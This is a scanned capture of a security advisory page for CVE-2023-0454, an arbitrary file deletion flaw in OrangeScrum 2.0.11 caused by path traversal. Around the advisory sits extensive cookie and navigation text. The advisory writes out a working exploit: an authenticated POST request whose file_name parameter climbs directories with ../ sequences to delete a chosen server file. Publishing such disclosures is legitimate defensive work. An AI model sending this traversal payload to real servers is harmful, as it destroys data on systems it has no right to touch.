fluidattacks.com
Open in
urlscan Pro
2606:4700:3108::ac42:2865
Public Scan
URL:
https://fluidattacks.com/advisories/slushii/
Submission: On February 08 via api from US — Scanned from DE
Submission: On February 08 via api from US — Scanned from DE
Form analysis 1 forms found in the DOM
<form class="StyledComponents__StyledSearchBox-sc-xre2wq-1 jTKymp" siq_id="autopick_8609"><input aria-label="Search" class="SearchInput" placeholder="Search" type="text" value=""><svg stroke="currentColor" fill="currentColor" stroke-width="0"
viewBox="0 0 24 24" class="SearchIcon c-fluid-gray f-1125 mh1" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
<g>
<path fill="none" d="M0 0h24v24H0z"></path>
<path
d="M18.031 16.617l4.283 4.282-1.415 1.415-4.282-4.283A8.96 8.96 0 0 1 11 20c-4.968 0-9-4.032-9-9s4.032-9 9-9 9 4.032 9 9a8.96 8.96 0 0 1-1.969 5.617zm-2.006-.742A6.977 6.977 0 0 0 18 11c0-3.868-3.133-7-7-7-3.868 0-7 3.132-7 7 0 3.867 3.132 7 7 7a6.977 6.977 0 0 0 4.875-1.975l.15-.15z">
</path>
</g>
</svg></form>Text Content
THIS WEBSITE USES COOKIES
We use cookies to personalise content and ads, to provide social media features
and to analyse our traffic. We also share information about your use of our site
with our social media, advertising and analytics partners who may combine it
with other information that you’ve provided to them or that they’ve collected
from your use of their services. You consent to our cookies if you continue to
use our website.
Do not sell or share my personal information
Use necessary cookies only Allow all cookies Show details
OK
Use necessary cookies only Allow selection Allow all cookies
Necessary
Preferences
Statistics
Marketing
Show details
Cookie declaration [#IABV2SETTINGS#] About
Necessary (9) Preferences (6) Statistics (21) Marketing (30) Unclassified
(1)
Necessary cookies help make a website usable by enabling basic functions like
page navigation and access to secure areas of the website. The website cannot
function properly without these cookies.
NameProviderPurposeExpiryType__cf_bm [x2]Clutch
fluidattacks.comThis cookie is used to distinguish between humans and bots. This
is beneficial for the website, in order to make valid reports on the use of
their website.1 dayHTTPbugsnag-anonymous-idfluidattacks.comThis cookie is used
to detect errors on the website - this information is sent to the website's
support staff in order to optimize the visitor's experience on the
website.PersistentHTMLCookieConsentCookiebotStores the user's cookie consent
state for the current domain1 yearHTTPCONSENT [x2]Google
YouTubeUsed to detect if the visitor has accepted the marketing category in the
cookie banner. This cookie is necessary for GDPR-compliance of the website. 2
yearsHTTPli_gcLinkedInStores the user's cookie consent state for the current
domain179 daysHTTP_zcsr_tmpZohoThis cookie is necessary for the login function
on the website. SessionHTTPhex (10)ZohoRegisters which server-cluster is serving
the visitor. This is used in context with load balancing, in order to optimize
user experience. SessionHTTP
Preference cookies enable a website to remember information that changes the way
the website behaves or looks, like your preferred language or the region that
you are in.
NameProviderPurposeExpiryTypelang [x2]LinkedInRemembers the user's selected
language version of a
websiteSessionHTTP@@scroll#fluidattacks.comPendingSessionHTMLzld#statejs.zohocdn.comRemembers
whether the user has minimized or closed chat-box or pop-up messages on the
website. 1 dayHTTPLS_CSRF_TOKEN [x2]Zoho
Zoho OneIdentifies the visitor across devices and visits, in order to optimize
the chat-box function on the website. SessionHTTP
Statistic cookies help website owners to understand how visitors interact with
websites by collecting and reporting information anonymously.
NameProviderPurposeExpiryType#_zldpZohoRegisters data on visitors'
website-behaviour. This is used for internal analysis and website optimization.
399 daysHTTP#_zldtZohoSets a ID for the visitor. This serves to count the number
of specific visitors on the website.1 dayHTTP_gaGoogleRegisters a unique ID that
is used to generate statistical data on how the visitor uses the website.399
daysHTTP_ga_#GoogleUsed by Google Analytics to collect data on the number of
times a user has visited the website as well as dates for the first and most
recent visit. 399 daysHTTP_gatGoogleUsed by Google Analytics to throttle request
rate1 dayHTTP_gidGoogleRegisters a unique ID that is used to generate
statistical data on how the visitor uses the website.1
dayHTTP_hjAbsoluteSessionInProgressHotjarThis cookie is used to count how many
times a website has been visited by different visitors - this is done by
assigning the visitor an ID, so the visitor does not get registered twice.1
dayHTTP_hjFirstSeenHotjarThis cookie is used to determine if the visitor has
visited the website before, or if it is a new visitor on the website.1
dayHTTP_hjIncludedInPageviewSampleHotjarDetermines if the user's navigation
should be registered in a certain statistical place holder.1
dayHTTP_hjIncludedInSessionSampleHotjarRegisters data on visitors'
website-behaviour. This is used for internal analysis and website optimization.
1 dayHTTP_hjRecordingLastActivityHotjarUsed in context with the website’s user
feedback functionality. Determines whether the user has been shown feedback
messages. SessionHTML_hjSession_#HotjarCollects statistics on the visitor's
visits to the website, such as the number of visits, average time spent on the
website and what pages have been read.1 dayHTTP_hjSessionUser_#HotjarCollects
statistics on the visitor's visits to the website, such as the number of visits,
average time spent on the website and what pages have been read.1
yearHTTP_pk_id#MatomoCollects statistics on the user's visits to the website,
such as the number of visits, average time spent on the website and what pages
have been read.1 yearHTTP_pk_ses#MatomoUsed by Piwik Analytics Platform to track
page requests from the visitor during the session.1
dayHTTPhjViewportIdHotjarSets a unique ID for the session. This allows the
website to obtain data on visitor behaviour for statistical
purposes.SessionHTMLln_orLinkedInRegisters statistical data on users' behaviour
on the website. Used for internal analytics by the website operator. 1
dayHTTPsiqlsdbfluidattacks.comSets a unique ID for the session. This allows the
website to obtain data on visitor behaviour for statistical
purposes.PersistentHTMLutsdbfluidattacks.comRegisters data on visitors'
website-behaviour. This is used for internal analysis and website optimization.
PersistentHTMLAnalyticsSyncHistoryLinkedInUsed in connection with
data-synchronization with third-party analysis service. 29 daysHTTPp.gifAdobe
Inc.Keeps track of special fonts used on the website for internal analysis. The
cookie does not register any visitor data. SessionPixel
Marketing cookies are used to track visitors across websites. The intention is
to display ads that are relevant and engaging for the individual user and
thereby more valuable for publishers and third party advertisers.
NameProviderPurposeExpiryTypeIDEGoogleUsed by Google DoubleClick to register and
report the website user's actions after viewing or clicking one of the
advertiser's ads with the purpose of measuring the efficacy of an ad and to
present targeted ads to the user.1 yearHTTPpagead/landing [x2]GoogleCollects
data on visitor behaviour from multiple websites, in order to present more
relevant advertisement - This also allows the website to limit the number of
times that they are shown the same advertisement.
SessionPixeltest_cookieGoogleUsed to check if the user's browser supports
cookies.1 dayHTTPfrMeta Platforms, Inc.Used by Facebook to deliver a series of
advertisement products such as real time bidding from third party advertisers.3
monthsHTTP_fbp Meta Platforms, Inc.Used by Facebook to deliver a series of
advertisement products such as real time bidding from third party advertisers.3
monthsHTTP_gcl_auGoogleUsed by Google AdSense for experimenting with
advertisement efficiency across websites using their services. 3
monthsHTTP_hjRecordingEnabledHotjarThis cookie is used to identify the visitor
and optimize ad-relevance by collecting visitor data from multiple websites –
this exchange of visitor data is normally provided by a third-party data-center
or ad-exchange.SessionHTMLprism_# [x2]prism.app-us1.comCollects information on
user preferences and/or interaction with web-campaign content - This is used on
CRM-campaign-platform used by website owners for promoting events or products.29
daysHTTPads/ga-audiencesGoogleUsed by Google AdWords to re-engage visitors that
are likely to convert to customers based on the visitor's online behaviour
across websites.SessionPixelpagead/1p-user-list/#GoogleTracks if the user has
shown interest in specific products or events across multiple websites and
detects how the user navigates between sites. This is used for measurement of
advertisement efforts and facilitates payment of referral-fees between
websites.SessionPixelbcookieLinkedInUsed by the social networking service,
LinkedIn, for tracking the use of embedded services.1
yearHTTPbscookieLinkedInUsed by the social networking service, LinkedIn, for
tracking the use of embedded services.1 yearHTTPlidcLinkedInUsed by the social
networking service, LinkedIn, for tracking the use of embedded services.1
dayHTTPUserMatchHistoryLinkedInUsed to track visitors on multiple websites, in
order to present relevant advertisement based on the visitor's preferences. 29
daysHTTPuesignZohoSets a unique ID for the specific user. This allows the
website to target the user with relevant offers through its chat functionality.
29 daysHTTPDEVICE_INFOYouTubeUsed to track user’s interaction with embedded
content.179 daysHTTPVISITOR_INFO1_LIVEYouTubeTries to estimate the users'
bandwidth on pages with integrated YouTube videos.179
daysHTTPYSCYouTubeRegisters a unique ID to keep statistics of what videos from
YouTube the user has seen.SessionHTTPyt.innertube::nextIdYouTubeRegisters a
unique ID to keep statistics of what videos from YouTube the user has
seen.PersistentHTMLyt.innertube::requestsYouTubeRegisters a unique ID to keep
statistics of what videos from YouTube the user has
seen.PersistentHTMLytidb::LAST_RESULT_ENTRY_KEYYouTubeStores the user's video
player preferences using embedded YouTube
videoPersistentHTMLyt-remote-cast-availableYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt-remote-cast-installedYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt-remote-connected-devicesYouTubeStores the user's video player
preferences using embedded YouTube
videoPersistentHTMLyt-remote-device-idYouTubeStores the user's video player
preferences using embedded YouTube
videoPersistentHTMLyt-remote-fast-check-periodYouTubeStores the user's video
player preferences using embedded YouTube
videoSessionHTMLyt-remote-session-appYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt-remote-session-nameYouTubeStores the user's video player
preferences using embedded YouTube videoSessionHTML
Unclassified cookies are cookies that we are in the process of classifying,
together with the providers of individual cookies.
NameProviderPurposeExpiryTypealgoliasearch-client-js-#.#.#-01234VWXYZfluidattacks.comPendingPersistentHTML
[#IABV2_LABEL_PURPOSES#] [#IABV2_LABEL_FEATURES#] [#IABV2_LABEL_PARTNERS#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_BODY_FEATURES#]
[#IABV2_BODY_PARTNERS#]
Cookies are small text files that can be used by websites to make a user's
experience more efficient.
The law states that we can store cookies on your device if they are strictly
necessary for the operation of this site. For all other types of cookies we need
your permission.
This site uses different types of cookies. Some cookies are placed by third
party services that appear on our pages.
You can at any time change or withdraw your consent from the Cookie Declaration
on our website.
Learn more about who we are, how you can contact us and how we process personal
data in our Privacy Policy.
Cookie declaration last updated on 08.01.23 by Cookiebot
519 results
* YOU ARE ROOT!
* PENETRATION TESTING AS A SERVICE
* HAVE YOU NOTICED THE PII LEAKAGE?
* THE INFINITE MONKEY FUZZER
* EDILIGENCE
* FASTEST-JSON-COPY 1.0.1 - PROTOTYPE POLLUTION
* DEBUG LIKE A BOSS
* SAFER, CHEAPER AND DEFTER
* SYSTEMS
* YOUR FILES HAVE BEEN ENCRYPTED!
* AMSI BYPASS USING PYTHON
* ELEARNSECURITY CERTIFIED MALWARE ANALYSIS PROFESSIONAL
* ATTACKING THE WEAKEST LINK
* DAST
* PRODUCT OVERVIEW
* CATEGORIES
* AMONG THE TOP GLOBAL LEADERS 2018
* TAINTED LOVE
* BREAKING THE BUILD
* APPROVED POST-QUANTUM CRYPTOGRAPHY?
Search by
Log inGet a DemoDownload eBookContact now
ServicesContinuous HackingResourcesCriteria
About UsClientsDifferentiatorsValuesReviewsResourcesEventsPeopleSecurity
SolutionsDevSecOpsSecure Code ReviewRed TeamingBreach and Attack
SimulationSecurity TestingPenetration TestingEthical HackingVulnerability
Management
CategoriesSASTDASTMPTSCAREPTaaSARMBASMAST
SystemsWeb ApplicationsMobile ApplicationsThick ClientsAPIs and
MicroservicesCloud InfrastructureNetworks and HostsInternet of ThingsSCADA and
OTContainers
PlansCertificationsBlogPartnersCareers
AdvisoriesFAQDocumentationContact
FOLLOW US
Services
* Continuous Hacking
Solutions
* DevSecOps
* Secure Code Review
* Red Teaming
* Breach and Attack Simulation
* Security Testing
* Penetration Testing
* Ethical Hacking
* Vulnerability Management
Systems
* Web Applications
* Mobile Applications
* Thick Clients
* APIs and Microservices
* Cloud Infrastructure
* Networks and Hosts
* Internet of Things
* SCADA and OT
* Containers
About Us
* Clients
* Differentiators
* Values
* Reviews
* Events
* People
* Security
Categories
* SAST
* DAST
* MPT
* SCA
* RE
* PTaaS
* MAST
Resources
* Criteria
PlansCertificationsBlogPartners
CareersAdvisoriesFAQDocumentation
Contact NowStart free trial
FOLLOW US
Solutions
DevSecOpsSecure Code ReviewRed TeamingBreach and Attack SimulationSecurity
TestingPenetration TestingEthical HackingVulnerability Management
CertificationsResourcesPlansAdvisoriesBlog
Log in
Contact now
Start free trial
1. Home
/
2. Advisories
/
3. OrangeScrum 2.0.11 Arbitrary File Delete via file_name
ORANGESCRUM 2.0.11 - ARBITRARY FILE DELETE VIA FILE_NAME
SUMMARY
NameOrangeScrum 2.0.11 - Arbitrary File Delete via file_nameCode
nameSlushiiProductOrangeScrumAffected versions2.0.11StatePublicRelease
Date2023-01-30
VULNERABILITY
KindLack of data validation - Path TraversalRule063. Lack of data validation -
Path TraversalRemoteYesCVSSv3
VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:HCVSSv3 Base Score8.1Exploit
availableNoCVE ID(s)CVE-2023-0454
DESCRIPTION
OrangeScrum version 2.0.11 allows an authenticated external attacker to delete
arbitrary local files from the server. This is possible because the application
uses an unsanitized attacker-controlled parameter to construct an internal path.
VULNERABILITY
This vulnerability occurs because the application uses an unsanitized
attacker-controlled parameter to construct an internal path.
EXPLOIT
To exploit this vulnerability, we only need to send the following malicious
malicious request to the server.
POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close
file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt
EVIDENCE OF EXPLOITATION
OUR SECURITY POLICY
We have reserved the ID CVE-2023-0454 to refer to this issue from now on.
* https://fluidattacks.com/advisories/policy/
SYSTEM INFORMATION
* Version: OrangeScrum 2.0.11
* Operating System: GNU/Linux
MITIGATION
There is currently no patch available for this vulnerability.
CREDITS
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive
Team.
REFERENCES
Vendor page https://github.com/Orangescrum/orangescrum/
TIMELINE
2023-01-23
Vulnerability discovered.
2023-01-23
Vendor contacted.
2023-01-23
Vendor replied acknowledging the report.
2023-01-30
Public Disclosure.
Services
Continuous Hacking
Solutions
DevSecOps
Secure Code Review
Red Teaming
Breach and Attack Simulation
Security Testing
Penetration Testing
Ethical Hacking
Vulnerability Management
Categories
SAST
DAST
MPT
SCA
RE
PTaaS
ARM
BAS
MAST
Systems
Web Applications
Mobile Applications
Thick Clients
APIs and Microservices
Cloud Infrastructure
Networks and Hosts
Internet of Things
SCADA and OT
Containers
Compliance
OWASP
PCI DSS
HIPAA
NIST
GDPR
CVE
CWE
About Us
Clients
Differentiators
Values
Reviews
Resources
Events
People
Blog
Certifications
Partners
Careers
Advisories
FAQ
Documentation
Contact
Copyright © 2023 Fluid Attacks. We hack your software. All rights reserved.
Service Status - Terms of Use - Privacy Policy - Cookie Policy
Leave us a Message
Leave a message